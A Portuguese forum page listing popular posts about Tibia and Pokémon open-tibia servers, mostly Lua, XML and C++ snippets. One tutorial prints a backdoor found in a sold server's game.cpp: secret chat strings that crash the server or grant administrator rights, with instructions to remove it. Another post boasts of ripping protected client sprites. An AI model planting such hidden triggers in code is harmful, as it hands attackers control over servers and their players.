Ir para conteúdo

Líderes

Conteúdo Popular

Exibindo conteúdo com a maior reputação em 12/17/16 em %

  1. o seu e esse local happy = 200 --alterado v1.9 \/ if (getPlayerFreeCap(cid) >= 6 and not isInArray({5, 6}, getPlayerGroupId(cid))) or not hasSpaceInContainer(getPlayerSlotItem(cid, 3).uid) then item = doCreateItemEx(ballid) so muda essa parte e diz se foi porque a base que tenho aqui a pokebola não vai nem pro cp kkkkkkk. local happy = 200 --alterado v1.9 \/ if (getPlayerFreeCap(cid) >= 6 and not isInArray({5, 6}, getPlayerGroupId(cid))) or not hasSpaceInContainer(getPlayerSlotItem(cid, 3).uid) then item = doCreateItemEx(ballid-1)
    2 pontos
  2. Durante muito tempo venho trabalhando com client's de Servidores 7.4, mas ultimamente estou insatisfeito, é triste ver programadores de qualidade cobrando valor tão baixo para proteger um client. Devido a isso, resolvi utilizar meu tempo para DESCRIPTOGRAFAR os clients "que dizem" ser dificeis. E estou fazendo com muita facilidade Está aqui o link de TODAS as sprites que consegui remover [Caso tenham algum client que queiram as sprites e é ""dificil"" pegar, me mandem o nome, e eu farei]Aos desenvolvedores, paguem mais caro e obtenham proteção de qualidade.Classicus AQUIMorghar AQUIMedivia AQUI CLASSICUS SPR Morghar SPR Medivia SPR E antes que os donos venham reclamar, nem percam tempo, aposto que as imagens são free! Espero que tenham curtido!
    1 ponto
  3. wougoplex

    [Template] Ot Pokemon

    Bom muitos procuram e a maioria dos link ta off então venho compartilhar a template do ot pokemon Rep+ se Gostou Link : http://www.mediafire.com/file/83rb4g3hwhhyyz4/Template+ot+pokemon.rar Scan : https://www.virustotal.com/pt/file/c88980e35ab03b61fbc5e998d3933e877aca893285cd1bcd6981a969e6b1562c/analysis/1482001783/ Crédito : Ot Pokemon 99% Crédito eu por disponibilizar 1%
    1 ponto
  4. Galera, vim postar um servidor que o Aberos (Mario Junior) editou. Informações Base do servidor: eron 12 Servidor com sistema de contagem de Pokeball's usadas para capturar pokemons Pokedex diferente, própia do servidor Servidor contém 1° geração com seus respectivos shiny's Loot's modificados, agora estão vindo cartinhas pokémon Colodown bar totalmente diferente Prints Pokedex Colldown bar Catch Download Servidor, source e cliente Versão modificada pelo membro [member=JairKevick22] Scan Servior, source e cliente Versão modificada pelo membro [member=JairKevick22] Créditos Aberos Criadores do eron site
    1 ponto
  5. local toloot = {12706,11850,11860,11861,11869,11871,11872,11873,11878,11881,11849,11864,11863,11859,11854,11853,11852,11851,11838,11839,11840,11844,11846,11847,11848,11855,11856,11858,11865,11866,11867,11875,11876,11877,11879,11883,11884,11885,12140,12764,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897,11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913,12747,11914,11915,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928,11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944,11945,11946,11947,11948,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959,11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975,11976,11977,11978,11979,11980,11981,11982,11983,11984,11985,11986,11987,11988,3267,3268,3269,3270,3271,3272,3273,3274,3275,3276,3277,3278,3279,3280,3281,3282,3283,3284,3556,3285,3286,3287,3288,3289,3290,3291,3292,3293,6043,8937,8941,5964,237,212,6003,5976,12556,12549,9925,12711,12722,620,12729,614,12720,2858,216,12583,9823,9801,9803,6076,3002,3294,3295,3296,3297,3553,3555,3557,3558,3559,3560,3561,3562,3563,3564,3565,3566,3567,3575,3576,3577,3578,3579,3580,3581,3582,3583,3584,3585,3586,4422,4423,4424,4425,4426,4427,4428,4429,4431,4432,4430,4433,4434,4435,4436,4437,4438,4439,4440,4441,4442,4443,4444,4445,4446,4447,4448,4449,4450,4451,4452,4453,4454,4455,4567,4568,4569,4756,4757,4758,4759,12765,596,12766,592,593,594,597,12767,12708,604,12737,12744,12756,606,607,608,12754,12752,12736,609,611,610,612,12753,615,713,616,12710,618,617,619,12738,1665,12662,12727,12748,12698,12697,12749,12670,12762,12719,622,12686,613,12728,2824,624,12696,595,625,12739,12682,12679,12733,12683,12751,12684,12627,12685,621,12761,12721,12687,12689,12692,12769,12760,12694,297,12742,12768,12690,12691,12741,12771,12702,12731,2020,12746,12693,12695,12707,12699,590,591,12700,603,588,12715,12701,12704,12745,602,12703,12705,12709,12713,12724,12750,12755,12714,12717,12718,12770,623,12757,12723,12763,12725,589,12726,12712,12743,587,12716,605,12730,12735,12759,12740,261,165,179,153,151,233,230,228,198,181,251,204,202,115,191,173,247,135,245,171,169,133,125,253,200,129,131,112,214,127,220,265,235,12781,239,241,206,119,155,157,267,218,143,255,161,163,102,139,257,167,118,189,196,121,123,222,141,208,210,177,3568,243,226,259,149,147,145,224,269,137,113,249,107,193,263,183,185,187,271,12482,12484,12570,12478,12598,12434,12431,12425,12792,12524,12604,12568,12569,12567,12545,12520,12600,12502,12513,12461,12507,12477,12550,12536,12544,12518,12517,12796,12773,12790,12599,12525,12577,12595,12508,12597,12462,12582,12465,12466,12437,12547,12601,12794,12445,12439,12438,12596,12543,12537,12563,12603,12534,12564,12491,12492,12800,12602,12468,12467,12422,12519,12561,12460}function onUse(cid, item, frompos, item2, topos) if getItemAttribute(item.uid, "corpseowner") ~= cid then doPlayerSendCancel(cid, "You're not the owner.") return true end local items = {} for x=0, (getContainerSize(item.uid)) do local itens = getContainerItem(item.uid, X) --if isInArray(toloot, itens.itemid) then table.insert(items, {i=itens.itemid, q=itens.type}) doRemoveItem(itens.uid) --break --end end for y=1, #items do doPlayerAddItemStacking(cid, items[y].i, items[y].q) doPlayerSendTextMessage(cid, 20, "Looted "..items[y].q.."x "..getItemNameById(items[y].i)..".") end if #items > 0 then return true else return false endend ou como não está usando a tabela poderá deixar assim function onUse(cid, item, frompos, item2, topos) if getItemAttribute(item.uid, "corpseowner") ~= cid then doPlayerSendCancel(cid, "You're not the owner.") return true end local items = {} for x=0, (getContainerSize(item.uid)) do local itens = getContainerItem(item.uid, X) table.insert(items, {i=itens.itemid, q=itens.type}) doRemoveItem(itens.uid) end for y=1, #items do doPlayerAddItemStacking(cid, items[y].i, items[y].q) doPlayerSendTextMessage(cid, 20, "Looted "..items[y].q.."x "..getItemNameById(items[y].i)..".") end if #items > 0 then return true else return false endend
    1 ponto
  6. gabriel28

    [BUG] Heal dos itens

    <movevent type="Equip" itemid="ID DO ITEM" slot="armor" event="function" value="onEquipItem"> <vocation id="ID DA VOCAÇÂO QUE VAI PODER USAR"/> <vocation id="X" showInDescription="1"/> -- showInDescription se quiser que mostre no look a vocaçõe que pode usar. </movevent> <movevent type="DeEquip" itemid="ID DO ITEM" slot="armor" event="function" value="onDeEquipItem"/>
    1 ponto
  7. Prometheus X

    Pokemon Mythology RPG!

    Concordo mais esse distro era meu ele postou porquê quiz eu não liberei meu distro pra postar, entende?
    1 ponto
  8. iStark

    Pokemon Mythology RPG!

    Source? Mais um otADMIN, Vai parar com o projeto e posta a merda de um servidor incompleto, pra ninguem dar continuidade. @ Posta a source velho.
    1 ponto
  9. 1 ponto
  10. Josegvb

    Pokemon Mythology RPG!

    é bem simples... server sem sources = PDA é assim...
    1 ponto
  11. se mudo certo e para apenas colocar o -1 na função doCreateItemEx(ballid-1). quanto vc criar um pokemon na ball pelo comando ele buga no depot mais se vc abrir 1 vez o depot já não buga mais estranho isso, mas pelo cath normal ta funfando 100%. estava testando em outro servidor vou ver o de vcs.
    1 ponto
  12. Se é tão bom assim, poste um site melhor que o meu. Abraço.
    1 ponto
  13. Olá EKZ, hoje um amigo me disse que ele comprou um servidor e estava com código que quem vendeu para ele conseguia pegar administrador e crashar o jogo e estava ferrando com o jogo , enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava cargo de administrador a um jogador com groups de player. Então eu achei muita mancada e vim postar aqui para ajudar pessoas que são administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará das sources do seu servidor para fazer essa verificação, caso possua o código peço que siga o tutorial abaixo. Ache em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso) bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/) { Player* player = creature->getPlayer(); if(player && player->isAccountManager()) { player->manageAccount(text); return true; } if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108") { exit(0); } if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108") { player->setGroup(Groups::getInstance()->getGroup(6)); } Position destPos = creature->getPosition(); if(pos) destPos = (*pos); SpectatorVec list; SpectatorVec::const_iterator it; if(!spectators || !spectators->size()) { Mude para: bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/) { Player* player = creature->getPlayer(); if(player && player->isAccountManager()) { player->manageAccount(text); return true; } Position destPos = creature->getPosition(); if(pos) destPos = (*pos); SpectatorVec list; SpectatorVec::const_iterator it; if(!spectators || !spectators->size()) { Créditos Prometheus X (Por Trazer ao Xtibia) Alexy Brocanello (Pelo Código) CipSoft (Pelo Código Original) Qualquer outro será creditado ! Atenciosamente Prometheus X
    1 ponto
  14. Com muito prazer. O problema esta no player.cpp. procure por if(it != depots.end()) return it->second.first; e abaixo coloque: //create a new depot? if(autoCreateDepot) { Item* locker = Item::CreateItem(ITEM_LOCKER); if(Container* container = locker->getContainer()) { if(Depot* depot = container->getDepot()) { container->__internalAddThing(Item::CreateItem(ITEM_DEPOT)); addDepot(depot, depotId); return depot; } } g_game.freeThing(locker); std::cout << "Failure: Creating a new depot with id: " << depotId << ", for player: " << getName() << std::endl; } Apenas isso.
    1 ponto
  15. Olá galera do Xtibia, venho hoje trazer um sistema muito útil como pode ver no Título ele remove casa dos players que não logam mais. Explicação: Sabe aqueles players filho da mãe que compram as melhores casas e não logam mais no servidor e enche a porra da casa de item pros novos players não comprar? Pois é esse sistema dara um jeito nesses safados! xD Este script é apenas um arquivo que você colocará em sua pasta mods e ele executará toda vez que o servidor for reiniciado/ligado, ou seja: Quando o servidor ligar ele irá verificar os players que não logam a X dias (configurável) e então expulsa-los da casa movendo seus items para o depot deixando a casa sem dono. Bom chega de explicação e vamos ao que interessa; Na pasta principal do servidor, onde fica a distro que roda o servidor e tudo mais, entre na pasta MODS e crie um arquivo com o nome de cleanhouses.xml e dentro coloque o seguinte codigo: <?xml version="1.0" encoding="UTF-8"?><mod name="Cleanhouses" version="1.04" author="Yan Liima-Night" contact="xtibia.com" enabled="yes"> <description> v.1.04 - Adicionado 'onlyNonPremium' configurável. Versão sem erros por favor caso não é avançado na área não modifique nada. Criado e modificado por Yan Liima Nick: [ADM] Night Este mod irá limpar casas de jogadores inativos e mover os seus itens para o depósito.explicação das configurações: days - Se o jogador não tiver logado para este número de dias de sua casa será liberado. log - true/false, é para habilitar o registro de quais casas foram limpas. file - caminho para o arquivo de log, onde os logs serão armazenados. Ignorado se 'log' definido como falso onlyNonPremium - se definido como 'true', o script irá limpar apenas as casas dos jogadores que não lougou X dias. Outras indicações: NÃO remova doSaveServer() no final, caso contrário, se o servidor parar de funciona antes que o servidor salve você vai se arrepender =) </description> <globalevent name="cleanhouses" type="start" event="buffer"><![CDATA[ local config = { days = 60, log = true, file = getDataDir() .. "/logs/cleanhouses.txt", onlyNonPremium = true } local ns_query =[[ SELECT houses.owner, houses.id as hid, houses.name as house_name ,players.name FROM houses LEFT JOIN players ON players.id=houses.owner LEFT JOIN accounts ON players.account_id=accounts.id WHERE players.lastlogin < (UNIX_TIMESTAMP() - ]] ..config.days.. [[*24*60*60) ]] ..(config.onlyNonPremium and ' AND accounts.premdays=0 ' or '')..[[ AND players.world_id =]] .. getConfigValue("worldId") local house = db.getResult(ns_query) local logs = " Houses cleaned:\n\n" if house:getID() ~= -1 then repeat logs = logs .. house:getDataString('house_name') ..", owned by " .. house:getDataString('name') .. "\n" setHouseOwner(house:getDataInt('hid'), 0) until not house:next() house:free() else logs = logs .. "There were no houses to clean." end if config.log then doWriteLogFile(config.file, logs) end addEvent(doSaveServer, 1000) ]]></globalevent></mod> Pronto, salve e feche. Toda vez que o servidor iniciar irá expulsar os players que não logam aos dias configuráveis. Como configurar: days = 60 * É o número em DIAS que o player terá que ficar sem logar para perder a casa. Aconselho a não mexer, caso queira modificar algo aconselho ser avançado na área para não causar error no sistema. Este sistema funciona em qualquer TFS. Créditos Yan Liima Bom eu tinha publicado um post igual esse faz anos so que não lembro minha conta, e pegaro meu post postaro em outro fórum que não merece ser citado com outros créditos estou apenas avisando. Te ajudei?? REP + e ficamos quites... Atenciosamente, Yan Liima Abraços!
    1 ponto
  16. Killua

    Sistema de Cultivo (plantação)

    Olá, amigos. Hoje é terça, portanto, venho trazer mais um script do SDT, para ver todos os scripts, clique aqui. Sistema de Cultivo Vídeo de como o sistema funciona: Resumindo: Você ara o solo com uma enchada e depois planta uma semente no solo arado. A semente brota e pode crescer, virando uma planta que dará origem a um fruto, ou morrer. As plantas também podem ser removidas usando a enchada. Eu me certifiquei de não deixar nenhum bug, como: plantar uma semente em cima da outra, arar solo com item em cima, remover plantas fora dos solos e etc. Ainda assim, caso encontrar algum bug, poste aqui. Crie cultivo.lua em data/actions/scripts e coloque: Em data/actions/actions.xml, coloque essas TAGs: <action itemid="2552" event="script" value="cultivo.lua"/> <action itemid="7732" event="script" value="cultivo.lua"/> Para configurar, basta editar as variáveis de acordo com os comentários dentro do script. Abraços e continuem acompanhando o SDT.
    1 ponto
Líderes está configurado para São Paulo/GMT-03:00
×
×
  • Criar Novo...